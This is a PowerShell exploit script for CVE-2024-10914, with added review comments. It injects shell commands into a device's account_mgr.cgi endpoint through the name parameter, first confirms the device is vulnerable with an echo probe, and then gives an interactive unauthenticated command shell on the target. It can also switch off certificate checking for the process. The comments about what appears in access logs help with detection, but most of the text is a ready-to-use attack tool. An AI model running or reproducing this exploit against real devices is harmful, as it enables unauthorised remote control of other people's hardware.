cve-2024-10914.ps1
#!/usr/bin/env pwsh
# Function to Print Banner
# Writes the script's ASCII-art banner and author tag to the host.
# Takes no parameters and returns nothing; the only effect is console output via Write-Host.
# NOTE(review): the art contains stray `**` runs and doubled backslashes, which looks like
# rendering damage from the page it was copied from - cosmetic only, confirm against the original file.
function Print-Banner {
# Expandable here-string: it contains no `$` or backtick sequences, so it is printed as written.
Write-Host @"
_______ ________ ___ ____ ___ ** ** _______ ____ _____ __
/ ____/ | / / ____/ |__ \\ / ** \\** \\/ // / < / ** \\/ ** < / // /
/ / | | / / **/**______/ // / / /_/ / // /_______/ / / / / /_/ / / // /_
/ /___ | |/ / /__/_____/ __// /_/ / **/** **/**___/ / /_/ /\\__, / /__ __/
\\____/ |___/_____/ /____/\\____/____/ /_/ /_/\\____//____/_/ /_/
@VeryLazyTech - Medium
"@
}
# Function to Verify Vulnerability
# Sends a single probe request (for CVE-2024-10914, per the file name) and reports whether
# a random marker string comes back in the response body.
# Parameters:
#   Url - base URL of the device. The CGI path is appended to it as-is; this function does
#         no validation or normalisation of the value.
# Returns nothing. Calls `exit 1`, which ends the whole script rather than just this
# function, when the marker is absent or the request fails.
# Relies on System.Web already being loaded; Main does that with Add-Type before calling.
# NOTE(review): the request is sent without credentials, cookies or extra headers. For
# detection purposes, what a web log would show is a GET to /cgi-bin/account_mgr.cgi with
# cmd=cgi_user_add and a name value wrapped in %27; ... ;%27.
function Verify-Vulnerability {
param (
[string]$Url
)
Write-Host "[!] Checking if target is vulnerable..."
# Generate a random 5-character string
# Letters A-Z / a-z only. Get-Random -Count draws without repeats, so the five characters are distinct.
$verify_string = -join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})
# The probe command only echoes the marker; it makes no other change on the device.
$cmd = "echo $verify_string"
# URL encode the command
$encoded_cmd = [System.Web.HttpUtility]::UrlEncode($cmd)
# The encoded command is placed inside the `name` query parameter between %27; and ;%27.
$endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;$encoded_cmd;%27"
try {
# -ErrorAction Stop turns request failures into terminating errors so the catch below runs.
$response = Invoke-WebRequest -Uri ($Url + $endpoint) -Method Get -ErrorAction Stop
# [regex]::Escape is defensive here; the marker is letters only.
# NOTE(review): any occurrence of the marker in the body counts as a positive. A page that
# merely reflects the `name` parameter would also match - confirm against a patched device.
if ($response.Content -match [regex]::Escape($verify_string)) {
Write-Host "[+] Vulnerable" -ForegroundColor Green
}
else {
# NOTE(review): this branch only shows the marker was not in this one response; it is
# not by itself evidence that the firmware is patched.
Write-Host "[-] Not vulnerable" -ForegroundColor Red
Write-Host "[-] Exiting..." -ForegroundColor Red
exit 1
}
}
catch {
# Untyped catch: every failure of the request lands here and the original error ($_)
# is discarded, so the message does not say why the check could not be completed.
Write-Host "[-] Error checking vulnerability" -ForegroundColor Red
exit 1
}
}
# Function to Exploit Target
# Interactive loop: reads a line from the operator, sends it to the device through the same
# request shape used by Verify-Vulnerability, and prints the response body.
# Parameters:
#   Url - base URL of the device; the CGI path is appended to it without validation.
# Returns nothing. The loop ends only when the operator types "exit".
# Relies on System.Web already being loaded; Main does that with Add-Type before calling.
# NOTE(review): every line entered produces its own GET to /cgi-bin/account_mgr.cgi with
# cmd=cgi_user_add, so a session shows up in access logs as repeated requests to that path
# whose name= values differ and are wrapped in %27; ... ;%27.
function Exploit-Target {
param (
[string]$Url
)
while ($true) {
$cmd = Read-Host "VeryLazyTech-Shell$"
# Check if the command is "exit"
# -eq on strings is case-insensitive in PowerShell, so "EXIT" also leaves the loop.
if ($cmd -eq "exit") {
Write-Host "[!] Exiting exploit mode..." -ForegroundColor Yellow
break
}
# URL encode the command
$encoded_cmd = [System.Web.HttpUtility]::UrlEncode($cmd)
# Operator input goes into the `name` query parameter between %27; and ;%27.
$endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;$encoded_cmd;%27"
try {
# -ErrorAction Stop makes request failures terminating so the catch below handles them.
$response = Invoke-WebRequest -Uri ($Url + $endpoint) -Method Get -ErrorAction Stop
# The whole response body is printed; nothing here separates command output from page markup.
if ($response.Content) {
Write-Host $response.Content
}
else {
Write-Host "[-] Command not available or returned no output." -ForegroundColor Yellow
Write-Host "[-] For exit enter 'exit'" -ForegroundColor Yellow
}
}
catch {
# Untyped catch: the error detail ($_) is dropped and the loop continues with the next prompt.
Write-Host "[-] Error executing command" -ForegroundColor Red
}
}
}
# Main Function
# Entry point: checks that a URL was given, adjusts process-wide TLS settings, loads
# System.Web, prints the banner, runs the probe and then asks before starting the
# interactive loop.
# Parameters:
#   Url        - base URL of the device. Declared optional, but its absence is rejected
#                below with a usage message and `exit 1`.
#   IgnoreCert - switch; when set, server certificate validation is turned off (see below).
# Returns nothing; ends the script with `exit 0` when the operator declines the prompt.
function Main {
param(
[Parameter(Mandatory=$false)][string]$Url,
[Parameter(Mandatory=$false)][switch]$IgnoreCert
)
# Check if URL is provided
# Only emptiness is checked; the value is not validated as a URI or restricted to a scheme.
if (-not $Url) {
Write-Host "Target URL is required. Use -Url <target_url>." -ForegroundColor Red
Write-Host "Usage: .\script.ps1 -Url <target_url> [-IgnoreCert]" -ForegroundColor Yellow
exit 1
}
# Add TLS support and potentially ignore certificate errors
# Plain assignment replaces the protocol list rather than adding to it, leaving TLS 1.2 as
# the only protocol enabled through ServicePointManager.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
if ($IgnoreCert) {
# Installs a callback that accepts every server certificate. The property is static and
# is never restored here, so validation stays off for later ServicePointManager-based
# HTTPS calls in the same PowerShell process, not only for this script's requests.
# NOTE(review): the shebang selects pwsh; confirm that Invoke-WebRequest there actually
# honours ServicePointManager settings.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
}
# Load required .NET assembly for URL encoding
# Verify-Vulnerability and Exploit-Target both call [System.Web.HttpUtility]::UrlEncode.
Add-Type -AssemblyName System.Web
# Print Banner
Print-Banner
# Verify Vulnerability
# Verify-Vulnerability calls `exit 1` unless the marker was found, so the prompt below is
# reached only after a positive result.
Verify-Vulnerability -Url $Url
# Prompt for Exploit
$choice = Read-Host "[?] Do you want to proceed with the exploit? [y/n]"
# Only a single "y" or "Y" proceeds; any other answer takes the else branch.
if ($choice -match '^[yY]$') {
Exploit-Target -Url $Url
}
else {
Write-Host "[!] Bye..." -ForegroundColor Yellow
exit 0
}
}
# Parse Arguments and Call Main Function
# No parsing is done on this line: the script's raw arguments are splatted into Main, and
# Main's param() block binds -Url and -IgnoreCert.
Main @args